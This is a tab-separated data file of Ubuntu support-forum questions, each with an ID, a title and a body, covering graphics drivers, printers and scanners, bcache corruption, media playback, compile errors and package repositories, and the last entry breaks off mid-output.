472879	how to fix no splash screen in ubuntu after nvidia proprietary driver installation	this is soultion how to fix no splash screen in ubuntu after nvidia proprietary driver installation . it 's no matter what ubuntu version you use , it should work anyway . ( tested on 14.04 ) open your terminal and type : sudo gedit /etc/default/grub find this line : # grub_gfxmode=640x480 add below ( of course choose your resolution ) : grub_gfxmode=1024x768x32 ( try without or different bit depth ) grub_gfxpayload_linux=1920x1080x32 ( you can also use the keep option ) save file and type in terminal : echo framebuffer=y | sudo tee /etc/initramfs-tools/conf.d/splash ( allows to avoid that the splash screen is displayed for a few seconds ) sudo update-initramfs -u sudo update-grub2 for all those who complain about the presence of black borders in `` plymouth '' , try to make these changes before installing the nvidia driver or switch back from nvidia to nouveau and from nouveau to nvidia . kernel update from the software updater ? it happened to me ; i do n't know if it matters . i do n't know for which of these reasons , but after a few reboots , the black borders are gone . update discovered the secret : during all these beautiful things , something strange happened . glxinfo | grep vendor server glx vendor string : sgi client glx vendor string : mesa project and sgi opengl vendor string : nouveau to fix it : i added to /etc/modprobe.d/blacklist.conf blacklist nouveau now : glxinfo | grep vendor server glx vendor string : nvidia corporation client glx vendor string : nvidia corporation opengl vendor string : nvidia corporation ! ! unfortunately , the black borders reappear ! !
472882	simplecv : how can i get the resoultion of a logitech cam ?	is there a way to alter the resolution of my logitech usb cam ( c930e ) in simplecv ? i seem to get the stream only in 640x480 .
472884	wifi performance poor on lenovo x201 running ubuntu 14.04	i am running the latest ubuntu on a lenovo thinkpad x201 , but noticed that the networking with wireless was performing poorly . to confirm that it was not the router or any other external source of the problem i made sure to keep the laptop in a fixed position and check against speedtest.net from ubuntu and windows 8 on the same machine . the test was repeated several times , back and forth . i have a 100meg internet connection , witch greatly exceeds the wireless bandwidth . ubuntu with default driver could only ever manage about 2.6 meg download , while windows consistently got 25+ meg download speed . how can i get the proper performance for this device ( intel wifi device ) ?
472886	building a samba4 , kerberos v5 , bind9-dlz based active directory domain controller on trusty ( ubuntu 14.04 lts )	first time poster ; - ) as per the title i am building a samba4 , kerberos v5 , bind9-dlz based active directory domain controller on trusty ( ubuntu 14.04 lts ) . my question is , only samba 4.1.6 is available through apt-get repo but i would like to install samba4 version 4.1.7 . do i need to download the source and build it ? in addition , if i have to build samba4 4.1.7 from source , would it be a good idea to use the [ checkinstall ] : http : //help.ubuntu.com/community/checkinstall `` utility '' in place of make install to insure the installation is tracked by the package manager/added to the installed package database ? any one have input on using checkinstall or maybe something else ? thank you , tim
472887	installing ubuntu server on a secondary hdd within ubuntu desktop	i have a spare hard drive on which i 'd like to install ubuntu server . is it possible to plug the hard drive into my pc as a secondary drive , download the iso and install ubuntu server onto the secondary hard drive from within my main ubuntu desktop install ?
472890	xerox workcentre 6605 drivers	i am searching for xerox workcentre 6605 drivers to get our office printer to work in various ubuntu versions , but mainly 13.04 . do you have any idea of how to do it ? i have been researching this . i tried this without luck , i saw this but no luck ( the printer is not supported ) and more of the same here how did you got it working ? thanks you sooo much for your help : ) itâ´s really apreciated .
472896	miktex in ubuntu 14.04 : could not find curl	i am trying to install miktex in ubuntu 14.04 lts . i am downloading the dependencies one by one , but below is where i got stuck : cmake warning at /usr/share/cmake-2.8/modules/findqt4.cmake:659 ( message ) : /usr/bin/qmake reported qt_install_libs as `` /usr/lib/x86_64-linux-gnu '' but qtcore could not be found there . qt is not installed correctly for the target build environment . call stack ( most recent call first ) : cmakelists.txt:347 ( find_package ) cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:108 ( message ) : could not find curl ( missing : curl_library curl_include_dir ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:315 ( _fphsa_failure_message ) /usr/share/cmake-2.8/modules/findcurl.cmake:54 ( find_package_handle_standard_args ) cmakelists.txt:354 ( find_package ) -- configuring incomplete , errors occurred ! see also `` /home/user/downloads/2.9/cmakefiles/cmakeoutput.log '' . see also `` /home/user/downloads/2.9/cmakefiles/cmakeerror.log '' . as for curl , i do have it . when i put curl -v i get the following : curl 7.35.0 ( x86_64-pc-linux-gnu ) libcurl/7.35.0 openssl/1.0.1f zlib/1.2.8 libidn/1.28 librtmp/2.3 protocols : dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smtp smtps telnet tftp features : asynchdns gss-negotiate idn ipv6 largefile ntlm ntlm_wb ssl libz tls-srp also , what qt should i install ?
472904	ca n't scan with xsane , or simple scan from hp deskjet all-in-one 4625	i found this related question , where the op is trying to connect to a printer/scanner via a network : xsane : failed to open device `hpaio : /net/photosmart_c5100_series ? zc=hp5180 ' : error during device i/o the most voted answer there suggests installing `` hplip toolbox '' , which rendered hplip useless after a restart because it could n't detect the printer again ! i uninstalled the toolbox and reinstalled hplip . i have the printer connected via usb . the error i get while trying to scan with xsane is : failed to start scanner : device is busy some help will be really appreciated ! this is my hp-check -rt output : [ hplip ] version=3.14.4 [ dirs ] home=/usr/share/hplip run=/var/run ppd=/usr/share/ppd/hp ppdbase=/usr/share/ppd doc=/usr/share/doc/hplip-3.14.4 html=/usr/share/doc/hplip-3.14.4 icon=/usr/share/applications cupsbackend=/usr/lib/cups/backend cupsfilter=/usr/lib/cups/filter drv=/usr/share/cups/drv/hp bin=/usr/bin # following values are determined at configure time and can not be changed . [ configure ] network-build=yes libusb01-build=no pp-build=no gui-build=yes scanner-build=yes fax-build=yes dbus-build=yes cups11-build=no doc-build=yes shadow-build=no hpijs-install=no foomatic-drv-install=no foomatic-ppd-install=no foomatic-rip-hplip-install=no hpcups-install=yes cups-drv-install=yes cups-ppd-install=no internal-tag=3.14.4 restricted-build=no ui-toolkit=qt4 qt3=no qt4=yes policy-kit=no lite-build=no udev_sysfs_rules=no hpcups-only-build=no hpijs-only-build=no hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : current contents of '/var/lib/hp/hplip.state ' file : hp-check [ 19991 ] : info : : plugins are not installed . could not access file : no such file or directory hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : current contents of '~/.hplip/hplip.conf ' file : hp-check [ 19991 ] : info : : [ upgrade ] notify_upgrade = false last_upgraded_time = 1401193409 pending_upgrade_time = 0 latest_available_version = 3.14.4 [ installation ] date_time = tuesday 27 may 2014 18:21:28 version = 3.14.4 hp-check [ 19991 ] : info : : < package-name > < package-desc > < required/optional > < min-version > < installed-version > < status > < comment > hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : | external dependencies | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : policykit admin-policy-framework optional - 0.104 ok - hp-check [ 19991 ] : info : : gs ghostscript required 7.05 9.05 ok - hp-check [ 19991 ] : info : : network network-wget optional - 1.13.4 ok - hp-check [ 19991 ] : info : : scanimage shell-scanning optional 1.0 1.0.22 ok - hp-check [ 19991 ] : info : : avahi-utils avahi-utils optional - 0.6.30 ok - hp-check [ 19991 ] : info : : dbus dbus required - 1.4.18 ok - hp-check [ 19991 ] : info : : cups cups required 1.1 1.5.3 ok 'cups scheduler is running' hp-check [ 19991 ] : info : : xsane sane-gui optional 0.9 0.998 ok - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : | general dependencies | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : reportlab python-pdf-lib optional 2.0 2.5 ok - hp-check [ 19991 ] : info : : libcrypto openssl-crypto-lib required - 1.0.1 ok - hp-check [ 19991 ] : info : : pil python-image-lib optional - 1.1.7 ok - hp-check [ 19991 ] : info : : pyqt4-dbus pyqt4-dbus required 4.0 4.9.1 ok - hp-check [ 19991 ] : info : : libjpeg jpeg-lib required - - ok - hp-check [ 19991 ] : info : : libpthread posix-threads-lib required - 2.15 ok - hp-check [ 19991 ] : info : : python-dbus python-dbus required 0.80.0 1.0.0 ok - hp-check [ 19991 ] : info : : python-devel python-sdk required 2.2 2.7.3 ok - hp-check [ 19991 ] : info : : pyqt4 python-qt4 required 4.0 4.9.1 ok - hp-check [ 19991 ] : info : : cups-devel cups-sdk required - 1.5.3 ok - hp-check [ 19991 ] : info : : sane-devel sane-sdk required - 1.0.22 ok - hp-check [ 19991 ] : info : : libusb usb-lib required - 1.0 ok - hp-check [ 19991 ] : info : : sane scan-lib required - 1.0.22 ok - hp-check [ 19991 ] : info : : cups-image cups-image-lib required - 1.5.3 ok - hp-check [ 19991 ] : info : : libnetsnmp-devel snmp-networking-sdk required 5.0.9 5.4.3 ok - hp-check [ 19991 ] : info : : python-xml python-xml-lib required - 2.0.1 ok - hp-check [ 19991 ] : info : : python-notify desktop-notifications optional - - ok - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : | python extentions | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : cupsext cups-extension required - 3.14.4 ok - hp-check [ 19991 ] : info : : pcardext photocard-extension required - 3.14.4 ok - hp-check [ 19991 ] : info : : hpmudext io-extension required - 3.14.4 ok - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : | scan configuration | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : hpaio hplip-sane-backend required - 3.14.4 ok 'hpaio found in /etc/sane.d/dll.conf' hp-check [ 19991 ] : info : : scanext scan-sane-extension required - 3.14.4 ok - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : | discovered scanner devices | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : device `hpaio : /usb/deskjet_4620_series ? serial=000000000010 ' is a hewlett-packard deskjet_4620_series all-in-one hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : | discovered usb devices | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : device uri model hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp : /usb/deskjet_4620_series ? serial=000000000010 hp deskjet 4620 series hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : | installed cups printer queues | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : deskjet_4620 hp-check [ 19991 ] : info : : -- -- -- -- -- -- hp-check [ 19991 ] : info : : type : printer hp-check [ 19991 ] : info : : device uri : hp : /usb/deskjet_4620_series ? serial=000000000010 hp-check [ 19991 ] : info : : ppd : /etc/cups/ppd/deskjet_4620.ppd hp-check [ 19991 ] : info : : ppd description : hp deskjet 4620 series , hpcups 3.14.4 hp-check [ 19991 ] : info : : printer status : printer deskjet_4620 is idle . enabled since tuesday 27 may 2014 05:54:16 pm ist hp-check [ 19991 ] : info : : communication status : good hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : deskjet_4625 hp-check [ 19991 ] : info : : -- -- -- -- -- -- hp-check [ 19991 ] : info : : type : printer hp-check [ 19991 ] : info : : device uri : hp : /usb/deskjet_4620_series ? serial=000000000010 hp-check [ 19991 ] : info : : ppd : /etc/cups/ppd/deskjet_4625.ppd hp-check [ 19991 ] : info : : ppd description : hp deskjet 4620 series , hpcups 3.14.4 hp-check [ 19991 ] : info : : printer status : printer deskjet_4625 is idle . enabled since tuesday 27 may 2014 05:53:55 pm ist hp-check [ 19991 ] : info : : communication status : good hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : | permission | hp-check [ 19991 ] : info : : -- -- -- -- -- -- -- hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : usb deskjet_4620 required - - ok node : '/dev/bus/usb/001/009 ' perm : ' root lp rw- rw- rw- rw- r -- ' hp-check [ 19991 ] : info : : no errors or warnings . hp-check [ 19991 ] : info : : hp-check [ 19991 ] : info : : done . edit : output of scanimage > image.pnm : scanimage : sane_start : device busy output of scanimage -l : device `hpaio : /usb/deskjet_4620_series ? serial=000000000010 ' is a hewlett-packard deskjet_4620_series all-in-one
472908	weird bold fonts in netbeans	i am trying to run netbeans 8.0 on ubuntu 14 but all fonts are bold and blurry , both in the actual editor and in the menus . i have tried with this solution but i do n't even have `` fonts-unfonts-core '' installed so it seems to be another problem . how do i get rid of the ugly font ? screenshot
472911	upgrade install from 13/10 to 14.04	i had a windows 8.1 intel based system running dual boot ubuntu 13.10 . i proceeded with upgrade made available when i logged into ubuntu . upgrade seemed to go ok , but upon reboot , ubuntu was unavailable and booted to an os type prompt with limited capabilities . i was unable to find any documentation on how to correct . i created a boot dvd , and am now offered on option to override windows or create an ubuntu volume . my original volume of 40gb is identified as well as my windows 8.1 boot partition . can i select the 40gb partition , fat32 , and assign /boot , and will this correct the problem . i also read a swap partition nay be needed , is this something i need to create and how ? i want to keep dual boot capability .
472921	how to grep the output of youtube-dl ?	the normal output for youtube-dl is the following [ download ] downloading video # 3 of 33 [ youtube ] wbwb0u8bjru : downloading webpage [ youtube ] wbwb0u8bjru : downloading video info webpage [ youtube ] wbwb0u8bjru : extracting video information [ download ] resuming download at byte 107919109 [ download ] destination : lec 6.mp4 [ download ] 86.2 % of 137.18mib at 48.80kib/s eta 06:37 i need to show the first and last monitor the downloading i use the command youtube-dl -cit -f 18 url | grep -e eta -e `` downloading video # '' it 's not working only the first line is working while the last line is not , and i see the download is running as the file size grows
472923	problems with testdisk recovery	my problem is that yesterday i replaced windows 7 with ubuntu 14.4 , and with that i accidentally deleted my partitions and lost my data . after that i read that there is this testdisk utility that i can use to recover my lost files . at first i tried using testdisk with booting from a ubuntu install disk ( i read somewhere , that i should do it like this ) , however i did n't found a way to install it ( the software center did n't found the program , and i'am not so skilled as to run a manually downloaded tar.bz7 file ) , so i tried to do it from the ubuntu installed to my computer . i followed the steps according to the testdisk step by step manual , after the quicksearch was done i selected the write menu to save the partition structure , then i rebooted because it asked me . howeverduring rebooting i got the message : `` disk read error : reboot ctrl+alt+del '' after that i could n't do anything so i reinstalled ubuntu again : / so is there still a chance to get my data after two reinstalls of ubuntu ? what did i do wrong ? thanks in advance !
472928	correct nvidia+intel graphics setup in 14.04	just upgraded to 14.04 to try to fix some other issues . now , something has gone wrong with my graphics . i have a thinkpad t530 with intel and nvidia graphics cards . $ inxi -sgx system : host : xyz kernel : 3.13.0-24-generic x86_64 ( 64 bit , gcc : 4.8.2 ) desktop : n/a distro : ubuntu 14.04 trusty graphics : card-1 : intel 3rd gen core processor graphics controller bus-id : 00:02.0 card-2 : nvidia gf108m [ nvs 5400m ] bus-id : 01:00.0 x.org : 1.15.1 drivers : fbdev , vesa , intel , nouveau ( unloaded : nvidia ) resolution : 1920x1080 @ 0.0hz glx renderer : n/a glx version : n/a direct rendering : n/a $ glxinfo name of display : :0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . i 'm not sure what i did but now something is wrong with my graphics , as should be visible from the above commands . nvidia-detector says `` none '' as well . i used to have bumblebee but then some website said to remove it and now something 's clearly wrong . what 's the right way to set things up ? should i try to add bumblebee back ? here 's what 's installed now : $ dpkg -- get-selections | grep nvidia nvidia-319 install nvidia-331 install nvidia-libopencl1-331 install nvidia-opencl-icd-331 install nvidia-prime install nvidia-settings install nvidia-settings-319 install
472935	phone nokia asha 202	i have got no answer on https : //ubuntuforums.org/showthread.php ? t=2221210 : - ( i have tried to connect to the internet with my asha 202 . i have filled in data from my windows xp connection ( working via nokia pc suite ) . no success .
472937	docker install tools/run command on existing container	i 'm using dokku to run some apps on an ubuntu 14.04 server . dokku creates the docker container with all the stuff in them to run . i 'd like to connect to the running container somehow and run apt-get install phantomjs -y . how would i go about doing this ? if i run this on the ubuntu host machine will it be available in the docker container ? i do n't have access to the docker file or the buildpacks since that 's all part of dokku
472940	0ad backport on trusty ( 14.04 )	is there possibility to upgrade 0ad from trusty backports to 0.0.16 version ? i can see that in backports there is 0.0.16 version http : //packages.ubuntu.com/trusty-backports/games/0ad . but after update and upgrade nothing happens . i selected trusty - backports repo . thanks !
472946	accidentally uninstalled ubuntu 14.04 system settings . how to get them back ?	somehow , cleaning up useless software ( using software center ) , i uninstalled ubuntu `` system settings '' . i did this by mistake . now i fail to find system settings application using software center ( and there are so many items in history ... ) . it seems strange to me because usually when i try to uninstall something critical ( system testing for example ) , the dependencies manager tells me it will uninstall the whole desktop system then . i am sure i did not have that warning . so i need the name of the software to install or a command line command rather than a system restore to get it back . very interesting thing . if you ever want to play with this and reproduce it , you will be confused to see ubuntu mobile system settings instead ! yes , mobile network and touchscreen settings ! happy pre-release viewing !
472947	all nodes that are in range are not receiving message in leach	when i send broadcast notification to other nodes some nodes are not receiving the notification . below is code . any help is appreciated thanks int clustercode ; int numcodesavail ; numcodesavail = 2 * config_.spreading_ - 1 ; currentch_ = sensor_node_- > nodeid ( ) ; currentchmac_ = mac_broadcast ; clustercode = ( mac_- > myadvnum ( ) % numcodesavail ) + 1 ; setcode ( clustercode ) ; wakeup ( ) ; send ( mac_broadcast , link_broadcast , leach_adv_ch , ( char * ) ( & code_ ) , sizeof ( currentch_ ) , bytes_id , config_.maxdist_ , 0 ) ; listenjoinreq_ = true ; clusternodes_.clear ( ) ; this works fine in first round but in second some of the nodes are not receiving the notification .
472950	is there a way to switch from fedora without wiping the home partition ?	is there a way to switching from fedora without wiping home partition ? i download cyanogenmod source code and it took about 3 days to downloading 10 gb no way to backup 10 gb i ca n't redownload again but can i switching to ubuntu without remove it
472951	totem not playing vcd	i am trying to play a vcd , but totem gives me an error : videos requires to install plugins to support the following multimedia feature : vcd protocol source so i did sudo apt-get install ubuntu-restricted-extras i still get the same error when i try to play the vcd again after installation , so i try : sudo apt-get install w64codecs libdvdcss2 but that gives me the error : package libdvdcss2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package w64codecs e : package 'libdvdcss2 ' has no installation candidate any way to make totem play the vcd ?
472954	bcache corruption after reboot	bcache seems to work fine , but after rebooting , the ext4 filesystem stored in /dev/bcache0 frequently , but not always , becomes corrupted - seemingly , it only damages metadata for recently modified files ( after e2fsck -y finished , i found in /lost+found a lot of files from my browser cache , some file lists from recently installed packages , etc . ) any idea what was causing the corruption or how to use bcache without encountering it again ? timeline : i installed ubuntu 14.04 and windows 8.1 to a 1tb hdd . i later added a 64gb ssd . my first attempts to install blocks to convert my root partition failed because it depends on python 3.3 , while ubuntu 14.04 only packages python 3.4 . i rebooted into windows to look into enabling intel smart response ( the windows equivalent of bcache ) , rebooted to switch the sata mode from ahci to raid ( because that 's the only way smart response can be enabled ) , booted windows again and enabled smart response to use ~18.6gb of the ssd as cache . i booted ubuntu and discovered that the disk partitions used by windows/smart response were not visible . after some investigation , i discovered that smart response , rather that just using disk partitions , had created a fake raid array , splitting the ssd into two parts . i installed mdadm and was able to see the two parts of the ssd under ubuntu . i used make-bcache -c to create a cache on the rest of the ssd . i booted into windows again , only to discover that smart response was no longer enabled and the raid array seemed to have disappeared after a lot of work , i forced python3-blocks and its dependencies to install despite the python version mismatch ( it seems that python 3.4 is almost completely backwards compatible with python 3.3 ) . with a bit more work , i attempted to use blocks to-bcache -- maintboot /dev/sda8 -- join some-uuid-that-looks-like-this to convert my root partition to a bcache backing device . it rebooted , but when the system resumed , it was still using /dev/sda8 directly , the conversion had n't happened . i put the ubuntu installer image on a usb stick and booted from it i moved /boot from the hdd to the ssd . i installed python 3.3 from the deadsnakes ppa , then forced python3-blocks and dependencies to install as before . i modified blocks/__main__.py to do _ped = imp.load_dynamic ( '_ped ' , '/usr/lib/ ... /_ped.something.so ' ) instead of import _ped to load pyparted because it could n't find it for reasons that i do n't understand i successfully ran blocks to-bcache /dev/sda8 -- join some-uuid-that-looks-like-this i helped grub find /boot , then booted into ubuntu , now with /dev/bcache0 mounted as the root partition , and regenerated grub 's config . i successfully rebooted into the ( now much faster ) ubuntu install . i rebooted several more times just to admire how fast it was . no signs of trouble . i turned on the computer the next morning and it booted , but found that chrome would n't open because it could n't get a lock to prevent user profile corruption , which in turn was due to the fact that the root partition had been automatically remounted read-only after an ext4 error ( it was mounted originally with errors=remount-ro ) i rebooted , and now found that the kernel could n't find the root partition by its uuid . running blkid on /dev/bcache0 confirmed that its uuid was not to be found . i rebooted to the usb stick , and ran e2fsck -f -y repeatedly until it came up clean . the first time it could n't even find the superblock and i had to follow its suggestion to specify an alternate superblock location . i rebooted to ubuntu running on bcache - it seemed to work fine . i reinstalled all of the installed packages one by one with apt-get -- reinstall to guard against later trouble caused by corrupted or lost files . after the package reinstallation completed , i followed its request to reboot . upon booting , it again experienced ext4 errors . i ran e2fsck -y and rebooted . everything seemed fine again , but i had no idea what kept causing the corruption . i resized the windows partition , created a new ext4 partition , and copied /home and /root into the new partition . i deleted the partitions that i had used as cache and backing device and did a clean install of ubuntu with /boot and / on the ssd and /home on the hdd . i restored my data from the backup partition onto the new /home and resized the windows partition back to its original size . no problems since . throughout all of this , the smart self-tests on both ssd and hdd claimed that they were passing .
472956	change the icon color in libreoffice calc	there appears to be no way of changing icon color in a calc chart . after creating an xy scatter plot , i can select `` format data series '' and can change the icon symbol and size , but not the color . there is an drop-down for line color , but when i do not have lines displayed this drop-down menu is grayed out . i have found that i can add lines to my chart , change the color of the lines , then remove the lines and i will have changed the color of the icons , but there should be a direct way to change icon color ( and there used to be in previous versions ) . i am using libreoffice calc version 4.2.3.3 , build id : 420m0 ( build:3 ) . running on ubuntu 14.04 .
472962	mp3 device not recognize as ums but as mtp ?	with ubuntu 12.04 my mp3 device ( which is compatible with both ums and mtp ) was manage as ums . but now with 14.04 , i ca n't find a way to use as before ( as ums ) . the only way ( which not a solution ) is to do a killall gvfs-mtp-volume-monitor . is there a correct a way ( like on windowz xp ) to choose which transfer protocol we prefer ? thanks ps : i have not amarok launched .
472963	vlc unable to open mrl	i am trying to play a vcd using : /usr/bin/vlc vcd : // but i get the error below : vlc media player 2.1.4 rincewind ( revision 2.1.4-0-g2a072be ) [ 0x14ec1c8 ] main interface error : no suitable interface module [ 0x1486118 ] main libvlc error : interface `` globalhotkeys , none '' initialization failed [ 0x1486118 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x7f815c0009b8 ] main input error : open of `vcd : // ' failed [ 0x7f815c0009b8 ] main input error : your input ca n't be opened [ 0x7f815c0009b8 ] main input error : vlc is unable to open the mrl 'vcd : // ' . check the log for details . any way to resolve this ?
472964	subversion 1.8.8 does n't work with java svn libraries	i 'm running an up-to-date 14.04 installation . in a java project built with ant , i 'm using the < svn > task to grab the current revision information . i 've got ( as far as i can tell ) up-to-date versions of the `` svnclientadapter.jar '' and `` svnant.jar '' libraries , and i 've got the libsvn-java library installed for the jni version of the adapter . after doing the 13.10 - > 14.04 upgrade , i was told by svn that i needed to run svn update because the version of the runtime was ahead of the stuff in my checked-out tree . after doing that , i get errors from the svn ant task : [ svn ] < wcversion > started ... [ svn ] svn : e155021 : this client is too old to work with the working copy at so what 's up ? judging from various old questions it seems like this is n't a new phenomenon .
472965	problem while installing ubuntu 14.04 from usb drive	i have recently downloaded the ubuntu 14.04 iso file via torrent . after downloading , i checked the md5 sum of the downloaded .iso file and it was correct . then i created bootable usb drive using the startup disk creator application . i tried to find the md5 sum using the command md5sum /dev/sdc1 but the terminal returned md5sum : /dev/sdc1 : permission denied . i am attaching the snapshot of the permissions tab of my usb drive to help you guys figure out what 's wrong . update 1 : i tried to install ubuntu 14.04 from that usb drive . but only a black screen showed up with the message boot error . why is this happening ? what should i do to rectify this problem ?
472970	rufus compiling error	vivek @ vivek-n61pb-m2s : /usr/local/src/rufus-1.4.7 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for ranlib ... ranlib checking for a sed that does not truncate output ... /bin/sed checking for rm ... /bin/rm checking for strip ... strip checking for windres ... no checking for inline ... inline enabling large file support ( iso support ) configure : creating ./config.status config.status : creating makefile config.status : creating src/makefile config.status : creating src/ms-sys/makefile config.status : creating src/syslinux/libfat/makefile config.status : creating src/syslinux/libinstaller/makefile config.status : creating src/libcdio/iso9660/makefile config.status : creating src/libcdio/udf/makefile config.status : creating src/libcdio/driver/makefile config.status : creating res/localization/makefile vivek @ vivek-n61pb-m2s : /usr/local/src/rufus-1.4.7 $ make making all in src make [ 1 ] : entering directory `/usr/local/src/rufus-1.4.7/src' making all in ms-sys make [ 2 ] : entering directory `/usr/local/src/rufus-1.4.7/src/ms-sys' cc libmssys_a-file.o in file included from file.c:23:0 : ../rufus.h:18:21 : fatal error : windows.h : no such file or directory # include < windows.h > ^ compilation terminated . make [ 2 ] : *** [ libmssys_a-file.o ] error 1 make [ 2 ] : leaving directory `/usr/local/src/rufus-1.4.7/src/ms-sys' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/usr/local/src/rufus-1.4.7/src' make : *** [ all-recursive ] error 1 im newb in ubuntu and never compile any apps on ubuntu . i 'm following this tutorial compilingeasyhowto
472971	how do i log into root ?	i ca n't log into root as login fails whenever i put the correct password in . how can i change the password ? how do i login ? i kinda a noob with ubuntu terminal .
472974	recommended method to watch amazon prime using ubuntu 14.04 lts	i realize that hal is no longer in the ubuntu software center for ubuntu 14.04 and it is only available from a third party at this time . but i would like to know what ubuntu 's plans are for integrating drm into linux ? especially with amazon 's integration into the search tool , one would hope that they would make it easier for their amazon prime customers to watch instant videos . is the repository for getting hal for 13.10 safe for use ? what will that break if i install it onto 14.04 ? or do we need to find another os that has drm built into it ? if hal is okay to add to the os using a third party repo , then why does n't ubuntu software center support it too ? i imagine that amazon 's contract with the video copyright holders requires that they have some protection on electronically distributed media . i also imagine that getting amazon to change is much harder than getting a bunch of software engineers to fix ubuntu . unless they do n't want too . at which point ubuntu is n't really a complete os . very disappointing . in general the ease of use of ubuntu , the software center , and the large variety of applications was alluring . but breaking drm was n't a great idea . ca n't wait to see what fails in our next update . please tell us that there is a plan that is going to work in our future .
472976	linux mint parse error	i try too much method but still do n't work . asus alis # apt-get update hit http : //linux-mint.froonix.org olivia release.gpg hit http : //archive.canonical.com raring release.gpg hit http : //linux-mint.froonix.org olivia release hit http : //archive.canonical.com raring release get:1 http : //packages.linuxmint.com olivia release.gpg [ 198 b ] hit http : //archive.canonical.com raring/partner sources hit http : //archive.ubuntu.com raring release.gpg hit http : //security.ubuntu.com raring-security release.gpg get:2 http : //linux-mint.froonix.org olivia/main amd64 packages hit http : //archive.canonical.com raring/partner amd64 packages hit http : //archive.canonical.com raring/partner i386 packages get:3 http : //packages.linuxmint.com olivia release [ 18,5 kb ] hit http : //mirrors.liquidweb.com raring release.gpg hit http : //archive.ubuntu.com raring-updates release.gpg hit http : //security.ubuntu.com raring-security release get:4 http : //linux-mint.froonix.org olivia/upstream amd64 packages get:5 http : //linux-mint.froonix.org olivia/import amd64 packages hit http : //archive.ubuntu.com raring release hit http : //security.ubuntu.com raring-security/main sources hit http : //mirrors.liquidweb.com raring-updates release.gpg get:6 http : //linux-mint.froonix.org olivia/romeo amd64 packages hit http : //archive.ubuntu.com raring-updates release hit http : //security.ubuntu.com raring-security/restricted sources hit http : //mirrors.liquidweb.com raring release get:7 http : //packages.linuxmint.com olivia/main sources [ 21,2 kb ] get:8 http : //linux-mint.froonix.org olivia/main i386 packages get:9 http : //archive.ubuntu.com raring/main amd64 packages hit http : //security.ubuntu.com raring-security/universe sources hit http : //mirrors.liquidweb.com raring-updates release get:10 http : //linux-mint.froonix.org olivia/upstream i386 packages hit http : //security.ubuntu.com raring-security/multiverse sources ign http : //archive.canonical.com raring/partner translation-en_us hit http : //mirrors.liquidweb.com raring/main sources ign http : //archive.canonical.com raring/partner translation-en get:11 http : //linux-mint.froonix.org 